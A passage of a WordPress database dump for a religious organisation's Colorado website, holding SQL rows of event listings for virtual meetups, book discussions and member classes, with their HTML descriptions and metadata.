Meetup!</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/274548556/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP VIRTUAL ONLINE EVENT - Soul Adventures Series: Embarking on Your Own Soul Adventures','','publish','closed','closed','','meetup-virtual-online-event-soul-adventures-series-embarking-on-your-own-soul-adventures','','','2020-12-28 13:03:20','2020-12-28 20:03:20','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262433',0,'tribe_events','',0),(262435,2,'2020-12-03 10:38:35','2020-12-03 17:38:35','','Virtual Meetup Event','','publish','closed','closed','','virtual-meetup-event','','','2020-12-03 10:38:35','2020-12-03 17:38:35','',0,'https://eckankar-colorado.org/?post_type=tribe_venue&#038;p=262435',0,'tribe_venue','',0),(262441,2,'2020-12-04 08:51:01','2020-12-04 15:51:01','<p><span style=\"font-size: 20pt; color: #f28a27;\">Do you ever ask yourself:</span></p>\r\n<ul>\r\n	<li><span style=\"font-size: 12pt;\">How will I fulfill my mission or purpose for being? Through my family? My career? My spiritual path?</span></li>\r\n	<li><span style=\"font-size: 12pt;\">How would my life be different if I knew why I’m here, if I knew my purpose?</span></li>\r\n	<li><span style=\"font-size: 12pt;\">What values do I live by? How do they inform my mission? How does this help me visualize my future?</span></li>\r\n	<li><span style=\"font-size: 12pt;\">I used to know my mission. How do I reconnect with that?</span></li>\r\n</ul>\r\n<p><span style=\"font-size: 12pt;\">“Each of you has a spiritual purpose for coming into this lifetime.” Harold Klemp, Ask the Master, Book One</span></p>\r\n<p><span style=\"font-size: 12pt;\">The Power of Mission gives you the ability to ride the waves of life. Your mission is a truth you hold to that gets you through thick and thin. Join us for a lively discussion on The Power of Mission. We will explore and discover ways to find your own mission and how to stay true to that mission.</span></p>\r\n<p><span style=\"font-size: 12pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p><span style=\"font-size: 12pt;\">To explore a deeper inner connection, check out <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener noreferrer\">TheSoundofSoul.org</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The Zoom link will be provided to those members who RSVP that they are attending.</span></p>\r\n<p><span style=\"font-size: 12pt;\">There is never a charge for this Meetup.<br />\r\n<br />\r\n</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/274979585/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','MEETUP VIRTUAL ONLINE EVENT - 12 Secrets of Spiritual Living: The Power of Mission','','publish','closed','closed','','meetup-virtual-online-event-12-secrets-of-spiritual-living-the-power-of-mission','','','2020-12-28 13:03:07','2020-12-28 20:03:07','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262441',0,'tribe_events','',0),(262442,2,'2020-12-04 08:50:29','2020-12-04 15:50:29','','man-outcrop-ocean','','inherit','closed','closed','','man-outcrop-ocean','','','2020-12-04 08:50:29','2020-12-04 15:50:29','',262441,'https://eckankar-colorado.org/wp-content/uploads/2020/12/man-outcrop-ocean.jpg',0,'attachment','image/jpeg',0),(262482,0,'2020-12-06 14:09:54','2020-12-06 21:09:54','','','','publish','closed','closed','','262482','','','2020-12-06 14:09:54','2020-12-06 21:09:54','',0,'https://eckankar-colorado.org/nf_sub/262482/',0,'nf_sub','',0),(262507,2,'2020-12-08 15:04:00','2020-12-08 22:04:00','','Online Satsang Class','','publish','closed','closed','','online-satsang-class','','','2020-12-08 15:04:00','2020-12-08 22:04:00','',0,'https://eckankar-colorado.org/?post_type=tribe_venue&#038;p=262507',0,'tribe_venue','',0),(262513,2,'2020-12-08 15:50:13','2020-12-08 22:50:13','<p>[ninja_form id=38]</p>','Spiritual Services Contact Form - for use in Events Calendar for Book Discussions Signup','','publish','closed','closed','','spiritual-services-contact-form-for-use-in-events-calendar-for-book-discussions-signup','','','2020-12-09 08:46:54','2020-12-09 15:46:54','',0,'https://eckankar-colorado.org/?post_type=popup&#038;p=262513',0,'popup','',0),(262517,2,'2020-12-08 16:57:43','2020-12-08 23:57:43','','Conference Call Book Discussion','','publish','closed','closed','','conference-call-book-discussion','','','2020-12-08 16:57:43','2020-12-08 23:57:43','',0,'https://eckankar-colorado.org/?post_type=tribe_venue&#038;p=262517',0,'tribe_venue','',0),(262518,2,'2019-08-17 10:53:24','2019-08-17 16:53:24','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Spiritual Laws of Life</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 13pt;\"><strong>Note: The discussion will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">There exist wonderful truths—spiritual laws that nourish us, one and all. Laws of wisdom, freedom, and charity, or divine love. How can we shape our lives and destiny to live in harmony with them?</span></p>\r\n<p><span style=\"font-size: 12pt;\">As awakened captains of our destiny, we can meet today’s challenges in a more relaxed and happy way. The spiritual laws of life give us the many resources to make the very best decision at any one moment.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Read Harold Klemp’s groundbreaking book. Watch a new vista of understanding open for you. You’ve not seen the likes of it. Learn how to keep in tune with your true spiritual nature. Suddenly you’re living a full, exciting life of greater love, energy, and wonder. Do you wish to open a door to the hidden spiritual truths that uplift us all? Then come along.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/The_Spiritual_Laws_of_Life-66-3.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p><strong><span style=\"font-size: 12pt;\">If you are interested in signing up for this discussion, please <span class=\"popmake-262513\"><a href=\"#\">Contact Us.</a></span></span></strong></p>','PUBLIC ECK BOOK DISCUSSION - The Spiritual Laws of Life','','publish','closed','closed','','book-discussion-2021-01-17','','','2021-02-19 10:30:41','2021-02-19 17:30:41','',128132,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-01-17#038;p=128132',0,'tribe_events','',0),(262519,2,'2019-08-17 10:53:24','2019-08-17 16:53:24','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Spiritual Laws of Life</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 13pt;\"><strong>Note: The discussion will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">There exist wonderful truths—spiritual laws that nourish us, one and all. Laws of wisdom, freedom, and charity, or divine love. How can we shape our lives and destiny to live in harmony with them?</span></p>\r\n<p><span style=\"font-size: 12pt;\">As awakened captains of our destiny, we can meet today’s challenges in a more relaxed and happy way. The spiritual laws of life give us the many resources to make the very best decision at any one moment.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Read Harold Klemp’s groundbreaking book. Watch a new vista of understanding open for you. You’ve not seen the likes of it. Learn how to keep in tune with your true spiritual nature. Suddenly you’re living a full, exciting life of greater love, energy, and wonder. Do you wish to open a door to the hidden spiritual truths that uplift us all? Then come along.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/The_Spiritual_Laws_of_Life-66-3.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p><strong><span style=\"font-size: 12pt;\">If you are interested in signing up for this discussion, please <span class=\"popmake-262513\"><a href=\"#\">Contact Us.</a></span></span></strong></p>','PUBLIC ECK BOOK DISCUSSION - The Spiritual Laws of Life','','publish','closed','closed','','book-discussion-2021-02-21','','','2021-02-19 10:30:41','2021-02-19 17:30:41','',128132,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-21#038;p=128132',0,'tribe_events','',0),(262520,2,'2019-08-17 10:53:24','2019-08-17 16:53:24','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Spiritual Laws of Life</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 13pt;\"><strong>Note: The discussion will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">There exist wonderful truths—spiritual laws that nourish us, one and all. Laws of wisdom, freedom, and charity, or divine love. How can we shape our lives and destiny to live in harmony with them?</span></p>\r\n<p><span style=\"font-size: 12pt;\">As awakened captains of our destiny, we can meet today’s challenges in a more relaxed and happy way. The spiritual laws of life give us the many resources to make the very best decision at any one moment.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Read Harold Klemp’s groundbreaking book. Watch a new vista of understanding open for you. You’ve not seen the likes of it. Learn how to keep in tune with your true spiritual nature. Suddenly you’re living a full, exciting life of greater love, energy, and wonder. Do you wish to open a door to the hidden spiritual truths that uplift us all? Then come along.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/The_Spiritual_Laws_of_Life-66-3.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p><strong><span style=\"font-size: 12pt;\">If you are interested in signing up for this discussion, please <span class=\"popmake-262513\"><a href=\"#\">Contact Us.</a></span></span></strong></p>','PUBLIC ECK BOOK DISCUSSION - The Spiritual Laws of Life','','publish','closed','closed','','book-discussion-2021-03-21','','','2021-02-19 10:30:41','2021-02-19 17:30:41','',128132,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-21#038;p=128132',0,'tribe_events','',0),(262521,2,'2019-08-17 10:53:24','2019-08-17 16:53:24','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Spiritual Laws of Life</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 13pt;\"><strong>Note: The discussion will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">There exist wonderful truths—spiritual laws that nourish us, one and all. Laws of wisdom, freedom, and charity, or divine love. How can we shape our lives and destiny to live in harmony with them?</span></p>\r\n<p><span style=\"font-size: 12pt;\">As awakened captains of our destiny, we can meet today’s challenges in a more relaxed and happy way. The spiritual laws of life give us the many resources to make the very best decision at any one moment.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Read Harold Klemp’s groundbreaking book. Watch a new vista of understanding open for you. You’ve not seen the likes of it. Learn how to keep in tune with your true spiritual nature. Suddenly you’re living a full, exciting life of greater love, energy, and wonder. Do you wish to open a door to the hidden spiritual truths that uplift us all? Then come along.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/The_Spiritual_Laws_of_Life-66-3.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p><strong><span style=\"font-size: 12pt;\">If you are interested in signing up for this discussion, please <span class=\"popmake-262513\"><a href=\"#\">Contact Us.</a></span></span></strong></p>','PUBLIC ECK BOOK DISCUSSION - The Spiritual Laws of Life','','publish','closed','closed','','book-discussion-2021-04-18','','','2021-02-19 10:30:41','2021-02-19 17:30:41','',128132,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-18#038;p=128132',0,'tribe_events','',0),(262570,0,'2020-12-09 09:17:09','2020-12-09 16:17:09','','','','publish','closed','closed','','262570','','','2020-12-09 09:17:09','2020-12-09 16:17:09','',0,'https://eckankar-colorado.org/nf_sub/262570/',0,'nf_sub','',0),(262743,2,'2019-12-18 15:03:33','2019-12-18 22:03:33','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Dream 1 Discourses\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">-This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Boulder - Member Class - The ECK Dream 1 Discourses','','publish','closed','closed','','eck-dream-1-discourses-2021-02-09','','','2020-12-16 10:23:18','2020-12-16 17:23:18','',225786,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-09#038;p=225786',0,'tribe_events','',0),(262744,2,'2019-12-18 15:03:33','2019-12-18 22:03:33','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Dream 1 Discourses\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">-This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Boulder - Member Class - The ECK Dream 1 Discourses','','publish','closed','closed','','eck-dream-1-discourses-2021-03-09','','','2020-12-16 10:23:19','2020-12-16 17:23:19','',225786,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-09#038;p=225786',0,'tribe_events','',0),(262745,2,'2019-12-18 15:03:33','2019-12-18 22:03:33','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Dream 1 Discourses\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">-This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Boulder - Member Class - The ECK Dream 1 Discourses','','publish','closed','closed','','eck-dream-1-discourses-2021-04-13','','','2020-12-16 10:23:19','2020-12-16 17:23:19','',225786,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-13#038;p=225786',0,'tribe_events','',0),(262746,2,'2019-12-18 15:03:33','2019-12-18 22:03:33','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Dream 1 Discourses\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">-This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Boulder - Member Class - The ECK Dream 1 Discourses','','publish','closed','closed','','eck-dream-1-discourses-2021-05-11','','','2020-12-16 10:23:19','2020-12-16 17:23:19','',225786,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-11#038;p=225786',0,'tribe_events','',0),(262747,2,'2019-12-18 15:03:33','2019-12-18 22:03:33','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Dream 1 Discourses\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">-This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Boulder - Member Class - The ECK Dream 1 Discourses','','publish','closed','closed','','eck-dream-1-discourses-2021-06-08','','','2020-12-16 10:23:19','2020-12-16 17:23:19','',225786,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-08#038;p=225786',0,'tribe_events','',0),(262748,2,'2019-12-18 15:03:33','2019-12-18 22:03:33','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Dream 1 Discourses\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">-This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Boulder - Member Class - The ECK Dream 1 Discourses','','publish','closed','closed','','eck-dream-1-discourses-2021-07-13','','','2020-12-16 10:23:19','2020-12-16 17:23:19','',225786,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-13#038;p=225786',0,'tribe_events','',0),(262749,2,'2019-12-18 15:03:33','2019-12-18 22:03:33','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Dream 1 Discourses\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">-This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Boulder - Member Class - The ECK Dream 1 Discourses','','publish','closed','closed','','eck-dream-1-discourses-2021-08-10','','','2020-12-16 10:23:20','2020-12-16 17:23:20','',225786,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-10#038;p=225786',0,'tribe_events','',0),(262750,2,'2019-12-18 15:03:33','2019-12-18 22:03:33','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Dream 1 Discourses\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">-This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Boulder - Member Class - The ECK Dream 1 Discourses','','publish','closed','closed','','eck-dream-1-discourses-2021-09-14','','','2020-12-16 10:23:20','2020-12-16 17:23:20','',225786,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-14#038;p=225786',0,'tribe_events','',0),(262751,2,'2019-12-18 15:03:33','2019-12-18 22:03:33','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Dream 1 Discourses\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">-This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Boulder - Member Class - The ECK Dream 1 Discourses','','publish','closed','closed','','eck-dream-1-discourses-2021-10-12','','','2020-12-16 10:23:20','2020-12-16 17:23:20','',225786,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-12#038;p=225786',0,'tribe_events','',0),(262789,2,'2020-12-09 10:45:05','2020-12-09 17:45:05','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1','','','2020-12-09 10:56:43','2020-12-09 17:56:43','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262789',0,'tribe_events','',0),(262791,2,'2020-12-09 10:45:05','2020-12-09 17:45:05','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2021-01-17','','','2020-12-09 10:56:43','2020-12-09 17:56:43','',262789,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-01-17#038;p=262789',0,'tribe_events','',0),(262792,2,'2020-12-09 10:45:05','2020-12-09 17:45:05','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\" - Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2021-02-21','','','2020-12-09 10:56:43','2020-12-09 17:56:43','',262789,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-21#038;p=262789',0,'tribe_events','',0),(262793,2,'2020-12-09 10:45:05','2020-12-09 17:45:05','<p><span style=\"color: #f28a27; font-size: 